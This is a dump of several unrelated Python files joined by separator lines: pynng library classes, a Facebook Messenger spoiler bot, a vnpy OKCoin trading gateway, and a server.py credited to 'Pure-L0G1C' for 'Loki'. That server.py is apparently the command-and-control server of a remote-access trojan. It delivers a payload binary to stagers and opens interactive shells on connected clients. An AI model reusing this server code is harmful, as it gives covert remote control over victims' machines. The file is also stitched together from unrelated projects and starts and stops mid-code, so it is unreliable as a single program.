if self._context is not None:
# check that nng still has a reference
if lib.nng_ctx_id(self.context) != -1:
ctx_err = lib.nng_ctx_close(self.context)
self._context = None
check_err(ctx_err)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@property
def context(self):
"""Return the underlying nng object."""
return self._context[0]
def __del__(self):
self.close()
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the context.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive a :class:`Message` on the context.
"""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
msg = await aio.arecv_msg()
self._socket._try_associate_msg_with_pipe(msg)
return msg
def _do_callbacks(pipe, callbacks):
for cb in callbacks:
try:
cb(pipe)
except Exception:
msg = 'Exception raised in pre pipe connect callback {!r}'
logger.exception(msg.format(cb))
@ffi.def_extern()
def _nng_pipe_cb(lib_pipe, event, arg):
logger.debug("Pipe callback event {}".format(event))
# Get the Socket from the handle passed through the callback arguments
sock = ffi.from_handle(arg)
# exceptions don't propagate out of this function, so if any exception is
# raised in any of the callbacks, we just log it (using logger.exception).
with sock._pipe_notify_lock:
pipe_id = lib.nng_pipe_id(lib_pipe)
if event == lib.NNG_PIPE_EV_ADD_PRE:
# time to do our bookkeeping; actually create the pipe and attach it to
# the socket
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_pre_pipe_add)
if pipe.closed:
# NB: we need to remove the pipe from socket now, before a remote
# tries connecting again and the same pipe ID may be reused. This
# will result in a KeyError below.
sock._remove_pipe(lib_pipe)
elif event == lib.NNG_PIPE_EV_ADD_POST:
# The ADD_POST event can arrive before ADD_PRE, in which case the Socket
# won't have the pipe_id in the _pipes dictionary
# _add_pipe will return an existing pipe or create a new one if it doesn't exist
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_post_pipe_add)
elif event == lib.NNG_PIPE_EV_REM_POST:
try:
pipe = sock._pipes[pipe_id]
except KeyError:
# we get here if the pipe was closed in pre_connect earlier. This
# is not a big deal.
logger.debug('Could not find pipe for socket')
return
try:
_do_callbacks(pipe, sock._on_post_pipe_remove)
finally:
sock._remove_pipe(lib_pipe)
class Pipe:
"""
A "pipe" is a single connection between two endpoints. This is the Python
version of `nng_pipe
<https://nanomsg.github.io/nng/man/v1.1.0/nng_pipe.5>`_.
There is no public constructor for a Pipe; they are automatically added to
the underlying socket whenever the pipe is created.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
url = StringOption('url')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
def __init__(self, lib_pipe, socket):
# Ohhhhkay
# so
# this is weird, I know
# okay
# so
# For some reason, I'm not sure why, if we keep a reference to lib_pipe
# directly, we end up with memory corruption issues. Maybe it's a
# weird interaction between getting called in a callback and refcount
# or something, I dunno. Anyway, we need to make a copy of the
# lib_pipe object.
self._pipe = ffi.new('nng_pipe *')
self._pipe[0] = lib_pipe
self.pipe = self._pipe[0]
self.socket = socket
self._closed = False
@property
def closed(self):
"""
Return whether the pipe has been closed directly.
This will not be valid if the pipe was closed indirectly, e.g. by
closing the associated listener/dialer/socket.
"""
return self._closed
@property
def id(self):
return lib.nng_pipe_id(self.pipe)
@property
def dialer(self):
"""
Return the dialer this pipe is associated with. If the pipe is not
associated with a dialer, raise an exception
"""
dialer = lib.nng_pipe_dialer(self.pipe)
d_id = lib.nng_dialer_id(dialer)
if d_id < 0:
raise TypeError('This pipe has no associated dialers.')
return self.socket._dialers[d_id]
@property
def listener(self):
"""
Return the listener this pipe is associated with. If the pipe is not
associated with a listener, raise an exception
"""
listener = lib.nng_pipe_listener(self.pipe)
l_id = lib.nng_listener_id(listener)
if l_id < 0:
raise TypeError('This pipe has no associated listeners.')
return self.socket._listeners[l_id]
def close(self):
"""
Close the pipe.
"""
check_err(lib.nng_pipe_close(self.pipe))
self._closed = True
def send(self, data):
"""
Synchronously send bytes from this :class:`Pipe`. This method
automatically creates a :class:`Message`, associates with this pipe,
and sends it with this pipe's associated :class:`Socket`.
"""
_ensure_can_send(data)
msg = Message(data, self)
self.socket.send_msg(msg)
def send_msg(self, msg):
"""
Synchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
self.socket.send_msg(msg)
async def asend(self, data):
"""
Asynchronously send bytes from this :class:`Pipe`.
"""
_ensure_can_send(data)
msg = Message(data, self)
return await self.socket.asend_msg(msg)
async def asend_msg(self, msg):
"""
Asynchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
return await self.socket.asend_msg(msg)
class Message:
"""
Python interface for `nng_msg
<https://nanomsg.github.io/nng/man/tip/nng_msg.5.html>`_. Using the
:class:`Message` interface gives more control over aspects of
sending the message. In particular, you can tell which
:class:`Pipe` a message came from on receive, and you can direct
which :class:`Pipe` a message will be sent from on send.
In normal usage, you would not create a :class:`Message` directly. Instead
you would receive a message using :meth:`Socket.recv_msg`, and send a
message (implicitly) by using :meth:`Pipe.send`.
Since the main purpose of creating a :class:`Message` is to send it using a
specific :class:`Pipe`, it is usually more convenient to just use the
:meth:`Pipe.send` or :meth:`Pipe.asend` method directly.
Messages in pynng are immutable; this is to prevent data corruption.
Warning:
Access to the message's underlying data buffer can be accessed with the
``_buffer`` attribute. However, care must be taken not to send a message
while a reference to the buffer is still alive; if the buffer is used after
a message is sent, a segfault or data corruption may (read: will)
result.
"""
def __init__(self, data, pipe=None):
# NB! There are two ways that a user can free resources that an nng_msg
# is using: either sending with nng_sendmsg (or the async equivalent)
# or with nng_msg_free. We don't know how this msg will be used, but
# we need to **ensure** that we don't try to double free. The flag
# _mem_freed is used to indicate that we cannot send the message again.
# The methods send_msg() and asend_msg() must ensure that the flag
# `_mem_freed` is set to True.
self._mem_freed = False
self._mem_freed_lock = threading.Lock()
if isinstance(data, ffi.CData) and \
ffi.typeof(data).cname == 'struct nng_msg *':
self._nng_msg = data
else:
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_msg_alloc(msg_p, 0))
msg = msg_p[0]
check_err(lib.nng_msg_append(msg, data, len(data)))
self._nng_msg = msg
# We may not have been given a pipe, in which case the pipe is None.
if pipe is None:
self._pipe = None
else:
self.pipe = pipe
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if not isinstance(pipe, Pipe):
msg = 'pipe must be type Pipe, not {}'.format(type(pipe))
raise ValueError(msg)
check_err(lib.nng_msg_set_pipe(self._nng_msg, pipe.pipe))
self._pipe = pipe
@property
def _buffer(self):
"""
Returns a cffi.buffer to the underlying nng_msg buffer.
If you access the message's buffer using this property, you must ensure
that you do not send the message until you are not using the buffer
anymore.
"""
with self._mem_freed_lock:
if not self._mem_freed:
size = lib.nng_msg_len(self._nng_msg)
data = ffi.cast('char *', lib.nng_msg_body(self._nng_msg))
return ffi.buffer(data[0:size])
@property
def bytes(self):
"""
Return the bytes from the underlying buffer.
"""
return bytes(self._buffer)
def __del__(self):
with self._mem_freed_lock:
if self._mem_freed:
return
else:
lib.nng_msg_free(self._nng_msg)
# pretty sure it's not necessary to set this, but that's okay.
self._mem_freed = True
def _ensure_can_send(self):
"""
Raises an exception if the message's state is such that it cannot be
sent. The _mem_freed_lock() must be acquired when this method is
called.
"""
assert self._mem_freed_lock.locked()
if self._mem_freed:
msg = 'Attempted to send the same message more than once.'
raise pynng.MessageStateError(msg)
|
webhook.py
|
from bottle import route, run, request, response, default_app
import json
import msbot.constants
import msbot.mslib
import msbot.msdb
import requests
import time
import msbot.settings
import sqlite3
from threading import Thread
db_file = msbot.settings.DB_LOCATION
# Helpers
def send_message(sender_psid, response):
request_body = {
msbot.constants.RECIPIENT: {
msbot.constants.ID: sender_psid
},
msbot.constants.MESSAGE: response,
}
print('sending image')
print(str(request_body))
params = {
msbot.constants.ACCESS_TOKEN: msbot.settings.PAGE_ACCESS_TOKEN,
msbot.constants.RECIPIENT: sender_psid
}
r = requests.post(msbot.constants.FB_MESSAGE_URL, params=params, json=request_body)
def to_text_response(text):
return { msbot.constants.TEXT: text }
def create_quick_reply_button(payload):
return {
msbot.constants.CONTENT_TYPE: msbot.constants.TEXT,
msbot.constants.TITLE: payload.capitalize(),
msbot.constants.PAYLOAD: payload,
}
def text_quick_reply_response(text, buttons):
return {
msbot.constants.TEXT: text,
msbot.constants.QUICK_REPLIES: buttons
}
def is_spoiler_allowed_by_options(spoiler, options):
return (
(
options.duplicates or
(not options.duplicates and not any(c.isdigit() for c in spoiler.image_url))
)
)
def filter_spoilers_by_user(spoilers, user):
return [ s for s in spoilers if is_spoiler_allowed_by_options(s, user.options) ]
def get_spoilers_for_user(user):
db = msbot.msdb.MSDatabase(db_file)
spoilers = db.get_spoilers_later_than(user.last_spoiled)
return filter_spoilers_by_user(spoilers, user)
# TODO: Refactor this to take in a user object and a last spoiled id
# Also write a test for it
UPDATE_BUTTONS = [
create_quick_reply_button(msbot.constants.SEND_CMD),
create_quick_reply_button(msbot.constants.RECENT_CMD),
]
def send_update(sender_psid, text):
send_message(
sender_psid,
text_quick_reply_response(text, UPDATE_BUTTONS)
)
def get_attach_id_for(image_url):
print('Getting attach id for ', image_url)
body = {
"message": {
"attachment": {
"type": "image",
"payload": {
"is_reusable": True,
"url": image_url
}
}
}
}
try:
attach_response = requests.post(msbot.constants.FB_API_URL, json=body)
except ConnectionError:
print('FB Connection Error')
else:
return json.loads(attach_response.text)['attachment_id']
def send_spoiler_to(user, spoiler):
db = msbot.msdb.MSDatabase(db_file)
response = {
"attachment": {
"type": "image",
"payload": {
"attachment_id": spoiler.attach_id
}
}
}
send_message(user.user_id, response)
def update_spoilers():
db = msbot.msdb.MSDatabase(db_file)
spoilers = [
s for s in msbot.mslib.getLatestSpoilers() if not
db.spoiler_exists(s)
]
attach_dict = { s: get_attach_id_for(s) for s in spoilers }
for spoiler, attach_id in attach_dict.items():
db.add_spoiler(spoiler, attach_id)
def update_user(user):
db = msbot.msdb.MSDatabase(db_file)
last_spoiler = db.get_latest_spoiler_id()
spoilers = get_spoilers_for_user(user)
def poll(user):
if spoilers:
resp = msbot.constants.RESP_UPDATE.format(num_spoilers=len(spoilers))
send_update(user.user_id, resp)
db.update_user(user.user_id, last_updated=last_spoiler)
def asap(user):
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
db.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler,
)
update_modes = {
msbot.constants.POLL_MODE_CMD: lambda user: poll(user),
msbot.constants.ASAP_MODE_CMD: lambda user: asap(user),
}
user_mode = user.options.update_mode
if user_mode in update_modes:
update_modes[user_mode](user)
else:
poll(user)
def update_users():
db = msbot.msdb.MSDatabase(db_file)
unnotified_users = db.get_all_unnotified_users()
for user in unnotified_users:
if db.get_user_from_id(user.user_id).last_updated < db.get_latest_spoiler_id():
update_user(user)
#send updates from MythicSpoiler every 10 minutes
def update():
while True:
time.sleep(600)
update_spoilers()
update_users()
#Handle messages received from user
INFO_BUTTON = create_quick_reply_button(msbot.constants.INFO_CMD)
HELLO_BUTTON = create_quick_reply_button(msbot.constants.HELLO_CMD)
RECENT_BUTTON = create_quick_reply_button(msbot.constants.RECENT_CMD)
MODE_BUTTON = create_quick_reply_button(msbot.constants.MODE_CMD)
OPTIONS_BUTTON = create_quick_reply_button(msbot.constants.OPTIONS_CMD)
UPDATE_MODE_BUTTONS = [
create_quick_reply_button(msbot.constants.POLL_MODE_CMD),
create_quick_reply_button(msbot.constants.ASAP_MODE_CMD),
]
INFO_PROMPT_BUTTONS = [
create_quick_reply_button(msbot.constants.SEND_CMD),
RECENT_BUTTON,
OPTIONS_BUTTON,
create_quick_reply_button(msbot.constants.GOODBYE_CMD),
]
OPTIONS_PROMPT_BUTTONS = [
MODE_BUTTON,
create_quick_reply_button(msbot.constants.DUPLICATES_CMD),
]
RESP_INVALID_CMD = text_quick_reply_response(
msbot.constants.RESP_INVALID_UNSUBBED,
[ HELLO_BUTTON ]
)
def handle_message(sender_psid, received_message):
database = msbot.msdb.MSDatabase(db_file)
def subscribe(sender_psid):
if database.user_exists(sender_psid):
return to_text_response(msbot.constants.RESP_ALREADY_SUBBED)
database.add_user(sender_psid)
return text_quick_reply_response(
msbot.constants.RESP_SUBBED,
[ INFO_BUTTON ]
)
def unsubscribe(sender_psid):
if database.user_exists(sender_psid):
database.delete_user(sender_psid)
return msbot.constants.RESP_UNSUBBED
return msbot.constants.RESP_ALREADY_UNSUBBED
def send(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
last_spoiler = database.get_latest_spoiler_id()
spoilers = get_spoilers_for_user(user)
if not spoilers:
return text_quick_reply_response(
msbot.constants.RESP_UPDATE_UPDATED,
[ RECENT_BUTTON ]
)
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
database.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler
)
return to_text_response(msbot.constants.RESP_UPDATE_COMPLETE)
return RESP_INVALID_CMD
def recent(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
last_spoiler = database.get_latest_spoiler_id()
last_spoil_date = database.get_latest_spoiler_date()
spoilers = database.get_all_spoilers_on_date(last_spoil_date)
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
database.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler
)
return to_text_response(
msbot.constants.RESP_LAST_SPOILER_INFO.format(
date_string=last_spoil_date
)
)
return RESP_INVALID_CMD
def mode(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
text = msbot.constants.RESP_MODE_PROMPT.format(
update_mode=user.options.update_mode
)
return text_quick_reply_response(text, UPDATE_MODE_BUTTONS)
return RESP_INVALID_CMD
def change_update_mode(sender_psid, mode):
if database.user_exists(sender_psid):
database.update_user(
sender_psid,
options={
msbot.constants.UPDATE_MODE: mode
}
)
return to_text_response(
msbot.constants.RESP_MODE_COMPLETE.format(update_mode=mode)
)
return RESP_INVALID_CMD
def toggle_duplicates(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
database.update_user(
sender_psid,
options={
msbot.constants.DUPLICATES: not user.options.duplicates
}
)
return to_text_response(
msbot.constants.RESP_DUPLICATE_TOGGLE_COMPLETE.format(
duplicate_status=(
msbot.constants.ON
if not user.options.duplicates
else msbot.constants.OFF
)
)
)
return RESP_INVALID_CMD
def options(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
return text_quick_reply_response(
msbot.constants.RESP_OPTIONS_PROMPT.format(
duplicate_status = (
msbot.constants.ON if user.options.duplicates
else msbot.constants.OFF
),
update_mode = user.options.update_mode
),
OPTIONS_PROMPT_BUTTONS
)
return RESP_INVALID_CMD
def info(sender_psid):
if database.user_exists(sender_psid):
return text_quick_reply_response(
msbot.constants.RESP_INFO_PROMPT,
INFO_PROMPT_BUTTONS
)
return RESP_INVALID_CMD
responses = {
msbot.constants.HELLO_CMD: lambda id: subscribe(id),
msbot.constants.GOODBYE_CMD: lambda id: to_text_response(unsubscribe(id)),
msbot.constants.SEND_CMD: lambda id: send(id),
msbot.constants.RECENT_CMD: lambda id: recent(id),
msbot.constants.MODE_CMD: lambda id: mode(id),
msbot.constants.POLL_MODE_CMD: lambda id: change_update_mode(
id,
msbot.constants.POLL_MODE_CMD
),
msbot.constants.ASAP_MODE_CMD: lambda id: change_update_mode(
id,
msbot.constants.ASAP_MODE_CMD
),
msbot.constants.DUPLICATES_CMD: lambda id: toggle_duplicates(id),
msbot.constants.OPTIONS_CMD: lambda id: options(id),
msbot.constants.INFO_CMD: lambda id: info(id),
}
message = received_message.lower()
if message in responses:
resp = responses[message](sender_psid)
else:
resp = RESP_INVALID_CMD
if database.user_exists(sender_psid):
resp = text_quick_reply_response(
msbot.constants.RESP_INVALID_SUBBED,
[ INFO_BUTTON ]
)
send_message(sender_psid, resp)
def handle_postback(sender_psid, received_postback):
pass
def is_allowed_psid(sender_psid):
return (
not msbot.settings.DEV_MODE or
(msbot.settings.DEV_MODE and sender_psid in msbot.settings.DEV_SAFELIST)
)
@route('/webhook', method='POST')
def webhook_event():
print('event received')
req = json.loads(request.body.getvalue().decode('utf-8'))
if req[msbot.constants.OBJECT] == msbot.constants.PAGE_OBJECT:
for entry in req[msbot.constants.ENTRY]:
event = entry[msbot.constants.MESSAGING][0]
sender_psid = event[msbot.constants.SENDER][msbot.constants.ID]
print("GOT MESSAGE FROM ", sender_psid)
if event[msbot.constants.MESSAGE]:
try:
if is_allowed_psid(sender_psid):
handle_thread = Thread(
target = handle_message, args=(
sender_psid,
event[msbot.constants.MESSAGE][msbot.constants.TEXT]
)
)
handle_thread.setDaemon(True)
handle_thread.start()
except KeyError:
print('Non-text message received')
elif event[msbot.constants.POSTBACK]:
handle_postback(sender_psid, event[msbot.constants.POSTBACK])
response.status = 200
return 'EVENT_RECEIVED'
else:
response.status = 404
@route('/webhook', method='GET')
def webhook_verify():
mode = request.query[msbot.constants.MODE]
token = request.query[msbot.constants.TOKEN]
challenge = request.query[msbot.constants.CHALLENGE]
if mode and token:
if mode == msbot.constants.SUBSCRIBE and token == msbot.settings.VERIFY_TOKEN:
print('WEBHOOK_VERIFIED')
response.status = 200
return challenge
else:
response.status = 403
if __name__ == '__main__':
run(host='0.0.0.0', port=8080)
else:
app = application = default_app()
update_thread = Thread(target = update)
update_thread.setDaemon(True)
update_thread.start()
|
server.py
|
# Date: 06/01/2018
# Author: Pure-L0G1C
# Description: Server
import ssl
import socket
from os import path
from lib import const
from time import sleep
from queue import Queue
from OpenSSL import crypto
from random import SystemRandom
from threading import Thread, RLock
from . lib import session, shell, interface
class Server(object):
def __init__(self):
self.interface = interface.Interface()
self.waiting_conn = Queue()
self.is_active = False # is the server active
self.lock = RLock()
self.server = None
self.port = None
self.ip = None
self.is_processing = False
def gen_cert(self):
key_pair = crypto.PKey()
key_pair.generate_key(crypto.TYPE_RSA, 2048)
cert = crypto.X509()
cert.get_subject().O = 'Loki'
cert.get_subject().CN = 'Sami'
cert.get_subject().OU = 'Pure-L0G1C'
cert.get_subject().C = 'US'
cert.get_subject().L = 'Los Santos'
cert.get_subject().ST = 'California'
cert.set_serial_number(SystemRandom().randint(2048 ** 8, 4096 ** 8))
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(256 * 409600)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key_pair)
cert.sign(key_pair, 'sha256')
with open(const.CERT_FILE, 'wb') as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(const.KEY_FILE, 'wb') as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key_pair))
def server_start(self):
if self.is_processing:
return
self.is_processing = True
self.gen_cert()
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(const.CERT_FILE, const.KEY_FILE)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind((self.ip, self.port))
self.is_active = True
sock.settimeout(0.5)
sock.listen(100)
self.server = context.wrap_socket(sock, server_side=True)
self.services_start()
except OSError:
self.display_text('Error: invalid IP')
self.port = None
self.ip = None
finally:
self.is_processing = False
def server_stop(self):
if self.is_processing:
return
self.is_processing = True
if not self.is_active:
self.is_processing = False
return
self.is_active = False
self.interface.close()
self.is_processing = False
self.ip, self.port = None, None
def manage_conn_info(self, sess_obj, conn_info):
if conn_info:
try:
with self.lock:
services = {
'ssh': {
'ip': const.PUBLIC_IP,
'port': const.SSH_PORT
}, 'ftp': {
'ip': const.PUBLIC_IP,
'port': const.FTP_PORT
}
}
sess_obj.send(args=services)
self.manage_conn(sess_obj, conn_info)
except:
pass
def manage_conn(self, sess_obj, conn_info):
_shell = shell.Shell(sess_obj, self.interface)
shell_thread = Thread(target=_shell.start)
self.interface.connect_client(sess_obj, conn_info, _shell)
shell_thread.daemon = True
shell_thread.start()
def send_payload(self, sess):
'''Send payload to stager
'''
if not path.exists(const.PAYLOAD_PATH):
print('Payload binary does not exist; please generate it')
return
with open(const.PAYLOAD_PATH, 'rb') as f:
while True:
data = f.read(const.BLOCK_SIZE)
if data:
sess.sendall(data)
else:
break
def examine_conn(self, s, conn_info):
if type(conn_info) != dict:
print('Client did not supply a proper data type')
return
if not 'code' in conn_info or not 'args' in conn_info:
print('Client did not supply both code and args')
return
if conn_info['code'] == None:
print('Client supplied no code')
return
if conn_info['code'] == const.STAGER_CODE:
self.send_payload(s.session)
return
if conn_info['code'] == const.CONN_CODE:
print('Establishing a secure connection ...')
self.manage_conn_info(s, conn_info)
def establish_conn(self, sess, ip):
s = session.Session(sess, ip)
conn_info = s.initial_communication()
if conn_info:
self.examine_conn(s, conn_info)
def waiting_conn_manager(self):
while self.is_active:
if self.waiting_conn.qsize():
session, ip = self.waiting_conn.get()
sleep(0.5)
self.establish_conn(session, ip)
def server_loop(self):
while self.is_active:
try:
session, ip = self.server.accept()
self.waiting_conn.put([session, ip])
except:
pass
def services_start(self):
server_loop = Thread(target=self.server_loop)
conn_manager = Thread(target=self.waiting_conn_manager)
server_loop.daemon = True
conn_manager.daemon = True
server_loop.start()
conn_manager.start()
print('Server started successfully')
# -------- UI -------- #
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
def start(self, ip, port):
if self.is_active:
self.server_stop()
self.ip, self.port = ip, int(port)
self.server_start()
sleep(1.2)
return self.is_active
def stop(self):
if self.is_active:
self.server_stop()
sleep(1.2)
return self.is_active
|
okcoinGateway.py
|
# encoding: UTF-8
'''
vn.okcoin的gateway接入
注意:
1. 前仅支持USD和CNY的现货交易,USD的期货合约交易暂不支持
'''
import os
import json
from datetime import datetime
from copy import copy
from threading import Condition
from queue import Queue
from threading import Thread
from vnpy.api.okcoin import vnokcoin
from vnpy.trader.vtGateway import *
# 价格类型映射
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in list(priceTypeMap.items())}
# 方向类型映射
directionMap = {}
directionMapReverse = {v: k for k, v in list(directionMap.items())}
# 委托状态印射
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
## 交易合约代码
############################################
# USD
BTC_USD_SPOT = 'BTC_USD_SPOT'
BTC_USD_THISWEEK = 'BTC_USD_THISWEEK'
BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK'
BTC_USD_QUARTER = 'BTC_USD_QUARTER'
LTC_USD_SPOT = 'LTC_USD_SPOT'
LTC_USD_THISWEEK = 'LTC_USD_THISWEEK'
LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK'
LTC_USD_QUARTER = 'LTC_USD_QUARTER'
# CNY
BTC_CNY_SPOT = 'BTC_CNY_SPOT'
LTC_CNY_SPOT = 'LTC_CNY_SPOT'
# 印射字典
spotSymbolMap = {}
spotSymbolMap['ltc_usd'] = LTC_USD_SPOT
spotSymbolMap['btc_usd'] = BTC_USD_SPOT
spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT
spotSymbolMap['btc_cny'] = BTC_CNY_SPOT
spotSymbolMapReverse = {v: k for k, v in list(spotSymbolMap.items())}
############################################
## Channel和Symbol的印射
############################################
channelSymbolMap = {}
# USD
channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT
# CNY
channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.api = Api(self)
self.leverage = 0
self.connected = False
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
fileName = self.gatewayName + '_connect.json'
path = os.path.abspath(os.path.dirname(__file__))
fileName = os.path.join(path, fileName)
try:
f = file(fileName)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = '读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = '连接配置缺少字段,请检查'
self.onLog(log)
return
# 初始化接口
self.leverage = leverage
if host == 'CNY':
host = vnokcoin.OKCOIN_CNY
else:
host = vnokcoin.OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = '接口初始化成功'
self.onLog(log)
# 启动查询
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
pass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class Api(vnokcoin.OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.active = False # 若为True则会在断线后自动重连
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
self.localNo = 0 # 本地委托号
self.localNoQueue = Queue() # 未收到系统委托号的本地委托号队列
self.localNoDict = {} # key为本地委托号,value为系统委托号
self.orderIdDict = {} # key为系统委托号,value为本地委托号
self.cancelDict = {} # key为本地委托号,value为撤单请求
self.initCallback()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
channel = data['channel']
callback = self.cbDict[channel]
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
self.writeLog('服务器连接断开')
# 重新连接
if self.active:
def reconnect():
while not self.gateway.connected:
self.writeLog('等待10秒后重新连接')
sleep(10)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
self.writeLog('服务器连接成功')
# 连接后查询账户和委托数据
self.spotUserInfo()
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
# 连接后订阅现货的成交和账户数据
self.subscribeSpotTrades()
self.subscribeSpotUserInfo()
self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
# 如果连接的是USD网站则订阅期货相关回报数据
if self.currency == vnokcoin.CURRENCY_USD:
self.subscribeFutureTrades()
